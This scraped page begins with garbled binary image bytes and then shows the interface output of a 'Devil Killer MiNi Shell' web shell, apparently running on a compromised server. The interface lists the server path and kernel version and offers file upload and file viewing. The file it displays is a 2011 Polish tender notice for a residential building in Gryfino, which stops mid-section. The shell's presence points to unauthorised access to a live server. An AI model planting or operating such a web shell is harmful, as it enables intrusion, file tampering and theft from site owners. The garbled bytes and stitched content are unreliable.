JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110214/21256-N-2011.html

<p class="kh_header"><b>Gryfino: BUDOWA  BUDYNKU MIESZKALNEGO WIELORODZINNEGO
PRZY UL. FLISACZEJ  NA DZIAŁCE NR 250/2 W GRYFINIE
w formie zaprojektuj i wybuduj</b><br>
<b>Numer ogłoszenia: 21256 - 2011; data zamieszczenia: 14.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gryfińskie Towarzystwo Budownictwa Społecznego Sp. z o.o. , ul. Grunwaldzka 1, 74-100 Gryfino, woj. zachodniopomorskie, tel. 091 4045031, faks 091 4162728.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.tbs.gryfino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: budownictwo i obiekty komunalne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA  BUDYNKU MIESZKALNEGO WIELORODZINNEGO
PRZY UL. FLISACZEJ  NA DZIAŁCE NR 250/2 W GRYFINIE
w formie zaprojektuj i wybuduj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych w rozumieniu ustawy z dnia  7 lipca 1994 r. - Prawo budowlane  zadania pn.
 PROJEKT BUDOWLANY  I BUDOWA BUDYNKU MIESZKALNEGO   
                  WIELORODZINNEGO Z USŁUGAMI
w Gryfinie na działce nr 250/2 obręb 1 Gryfino przy ul. Flisaczej
Wykonanie  projektu  budowlanego  wielobranżowego budynku trzyklatkowego mieszkalnego wielorodzinnego z usługami  przy ul. Flisaczej w Gryfinie  zgodnie 
z miejscowym planem zagospodarowania przestrzennego miasta Gryfino , - rejon ulicy Flisaczej , zatwierdzonym uchwałą Rady Miejskiej w Gryfinie Nr  XLIX/638/02  z dnia 10.10.2002 r. (ogłoszoną w Dzienniku Urzędowym Województwa Zachodniopomorskiego Nr 75 z dnia 25.10.2002 r. , poz. 1543 )
Przedmiot zamówienia został opisany w   Programie funkcjonalno - użytkowym pn.budowa   budynku mieszkalnego wielorodzinnego  przy ul. Flisaczej  na działce nr 250/2 w  Gryfinie i obejmuje:

 Etap I - faza projektowa :
    1) opracowanie projektu budowlanego, niezbędnego do uzyskania decyzji o  
        pozwoleniu na  Budowę , zgodnie z obowiązującymi przepisami prawa, 
       zakresem opisanym w SIWZ  oraz  programie funkcjonalno- użytkowym  w 
       sposób zgodny z ustaleniami określonymi  w miejscowym planie    
        zagospodarowania przestrzennego, 
2)  przedłożenie opracowanego projektu budowlanego wszystkich   branż , 
     przedmiarów robót   Zamawiającemu do zatwierdzenia  ostatecznej wersji 
     dokumentacji projektowej, 
3)  opracowanie Harmonogramu rzeczowo - finansowego robót budowlanych i 
      przedłożenie    harmonogramu do zatwierdzenia przez  Zamawiającego, 
4 ) uzyskanie ostatecznej decyzji o pozwoleniu na budowę. 

 Etap II - - faza wykonania robót budowlanych: 
1) wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej 
    dokumentacji  projektowej, zgodnie z decyzją o pozwoleniu na 
     budowę, Harmonogramem rzeczowo -   finansowym robót budowlanych , 
    obowiązującym prawem, normami, zasadami wiedzy  technicznej, sztuką 
     budowlaną i  SIWZ, 
2)  wykonanie robót pomocniczych, przygotowawczych i porządkowych oraz 
     naprawa ewentualnych uszkodzeń, 
3) zapewnienie kierownika budowy, kierowników robót wymaganych branż oraz 
    nadzoru  autorskiego projektantów, w cenie oferty, 
4) zagospodarowanie terenu: uporządkowanie terenu, przebudowa ciągów 
    komunikacyjnych,  uzupełnienie terenów zielonych, 
5) Przeprowadzenie wymaganych prób i badań, opracowanie świadectwa 
   charakterystyki  energetycznej dla budynków oraz dokumentacji powykonawczej 
   i geodezyjnych pomiarów  powykonawczych lokali .
Etap III - uzyskanie pozwolenia na użytkowanie: 
1)   przygotowanie dokumentów wymaganych przepisami prawa, związanych z 
      oddaniem obiektu  do użytkowania, 
2) współpraca z Inspektorami Nadzoru oraz Zamawiającym w zakresie uzyskania 
     pozwolenia  na użytkowanie ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 45.21.13.40-4, 45.21.10.00-9, 45.33.20.00-3, 45.33.11.00-7, 45.31.00.00-3, 45.23.31.00-0, 45.31.61.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 450.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> sto pięćdziesiąt tysiecy PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest uprawniony do występowania w obrocie prawnym , zgodnie z wymaganiami ustawowymi : Zamawiający uzna warunek za spełniony , jeżeli wykonawca załączy aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub zgłoszenie do ewidencji działalności , wystawione nie wcześniej niż 6 miesiecy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże się :
        a)  wykonaniem co najmniej 2 robót budowlanych polegających na budowie  
            budynków  mieszkalnych wielorodzinnych  rozumieniu § 3 pkt 4  
            rozporządzenia Ministra Infrastruktury z dnia 12  kwietnia 2002 r. w 
            sprawie  warunków technicznych, jakim powinny odpowiadać budynki i  
            ich usytuowanie (Dz. U. z 2002r. nr 75, poz. 690 ze  zm.) o kubaturze nie  
            mniejszej niż 5.000  m3 i wartości  nie mniejszej niż 4.000.000 
           zł brutto każda w tym przynajmniej jeden budynek  wielorodzinny z 
           miejscami   postojowymi w podziemiu .
     b)   Wykonawca przedstawi skróconą koncepcję programowo-przestrzenną 
           odpowiadającą wymogom Programu Funkcjonalno-Użytkowemu  oraz 
           zgodną z zapisami Miejscowego Planu Zagospodarowania Przestrzennego
            miasta Gryfino - rejon ulicy Flisaczej , zatwierdzonym uchwałą Rady 
           Miejskiej w Gryfinie Nr XLIX/638/02  z dnia 10.10.2002 r.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje niezbędnym sprzętem do realizacji zamówienia .
Zamawiający uzna warunek za spełniony , jeżeli wykonawca przedstawi wykaz sprzętu , którym dysponuje , niezbędnego do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w rozumieniu Zamawiającego spełni Wykonawca, który dysponuje: 
   1. projektantami: 
       a) minimum jedną osobą z uprawnieniami budowlanymi do projektowania w 
         specjalności konstrukcyjno - budowlanej bez ograniczeń w rozumieniu § 17 
         ust. 1 rozporządzenia  Ministra Transportu i Budownictwa z dnia 28 kwietnia 
         2006 r. W sprawie samodzielnych  funkcji technicznych w budownictwie 
          (Dz.U z 2006r. nr 83, poz.578), 
     b) minimum jedną osoba z uprawnieniami budowlanymi do projektowania w 
         specjalności architektonicznej bez ograniczeń w rozumieniu § 16 ust. 1, 
    c) minimum jedną osobą z uprawnieniami budowlanymi do projektowania w 
         specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń 
        elektrycznych i elektroenergetycznych bez ograniczeń w rozumieniu
        § 24 ust. 1,  
     d)  minimum jedną osobą z uprawnieniami budowlanymi do projektowania w 
         specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, 
         wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez 
         ograniczeń . , 
 2. Kierownikiem budowy: 
     a)  minimum jedną osobą posiadającą uprawnienia do pełnienia funkcji 
          technicznych w budownictwie tj. do kierowania robotami budowlanymi w 
          specjalności konstrukcyjno- budowlanej bez ograniczeń , 
3. Kierownikami robót: 
     a) minimum jedną osobą posiadającą uprawnienia do pełnienia funkcji 
         technicznych w  budownictwie tj. do kierowania robotami budowlanymi w 
         specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  
         elektrycznych i elektroenergetycznych bez   ograniczeń 
     b) minimum jedną osobą posiadającą uprawnienia do pełnienia funkcji 
         technicznych w  budownictwie tj. do kierowania robotami budowlanymi w 
         specjalności instalacyjnej w  zakresie sieci, instalacji i urządzeń cieplnych, 
         wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez 
         ograniczeń w</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca w ostatnich 2 latach (2008, 2009) realizował sprzedaż (obrót) o 
      wartości przeciętnie rzędu 10 mln PLN rocznie, co stwierdzi w oparciu o 
       dołączone Sprawozdanie finansowe za rok 2008 i 2009 wraz z opinią biegłego 
        rewidenta . W przypadku wykonawcy   nie zobowiązanego do sprawozdań 
       finansowych należy załączyć inne dokumenty  określające obroty oraz 
       zobowiązania i należności . W przypadku oferty wspólnej  (konsorcjum ) 
       warunek ten powinien spełnić w 80%  Lider konsorcjum  a  konsorcjum   jako 
        całość w 100% ;
  b) Wykonawca legitymuje się realną   zdolnością do zaciągnięcia kredytu 
      obrotowego w   wysokości nie mniejszej niż   3.500.000 PLN (kwota 
      uzasadniona wartością zamówienia, przy zaangażowania   środków 
      Wykonawcy w okresie do 12  miesięcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 2 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) wykaz robot budowlanych w zakresie niezbędnym do wykazania spełniania 
    warunku   wiedzy    i doświadczenia, wykonanych w okresie ostatnich trzech lat 
    przed upływem   terminu składania ofert, a jeżeli okres prowadzenia działalności 
     jest krótszy - w tym  okresie, z podaniem ich rodzaju i wartości, daty i miejsca 
     wykonania oraz załączeniem  dokumentu potwierdzającego, że roboty zostały 
      wykonane zgodnie z zasadami sztuki   budowlanej i prawidłowo ukończone.
2)skróconą  Koncepcję Programowo-Przestrzenną wykazująca ilość i wielkość 
    poszczególnych elementów funkcjonalnych budynku  zawierającą :
           -  skrócony opis techniczny wraz z zestawieniem powierzchni wszystkich  
               lokali
           -  plan zagospodarowania całej działki oraz zestawienie wskaźników 
              wynikających z   planu miejscowego
           -  rzuty poszczególnych kondygnacji
           -  charakterystyczne przekroje  i elewacje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 6.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Sposób dokonania oceny spełnienia warunków udziału w postępowaniu 
     wymaganych od   wykonawców ,  określony zostanie według formuły  
     spełnia  -  nie spełnia oraz   na  podstawie oceny punktowej przyznanej przez 
     Zamawiającego :
     1) za wykazanie wykonania więcej niż dwóch budynków określonych w pkt.1.  
         ppk.1a) 10 punktów za każdy następny budynek 
     2) za wykazanie w przedstawionej koncepcji(pkt.1.  ppk.1b)  powierzchni 
        użytkowej   Nie mniej niż 1000 m2 - 10 punktów , 
         Za powierzchnię powyżej 1000 m2 - 10 punktów za każde następne 100 m2
      3) za wykazanie , że zatrudniał przeciętnie w latach 2009 i 2010 na umowę o 
        pracę   Przynajmniej 50 pracowników - 5 punktów 
          Za każde 10 osób powyżej 50 pracowników - 5 punktów 
      4)  za wykazanie sprzedaży przeciętnej wysokości w latach 2008 i 2009 
           minimum  10 mln zł  - 5 punktów
       a sprzedaż powyżej 10 mln zł - 5 punktów za każde 2 mln zł powyżej 10 mln zł 
      5)  za oświadczenie banku o zdolności kredytowej wykonawcy do zaciągnięcia  
           kredytu obrotowego w wysokości minimum 3,5 mln zł - 20 punktów
           za każdy 1 mln zł powyżej 3,5 mln zł - 5 punktów .</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
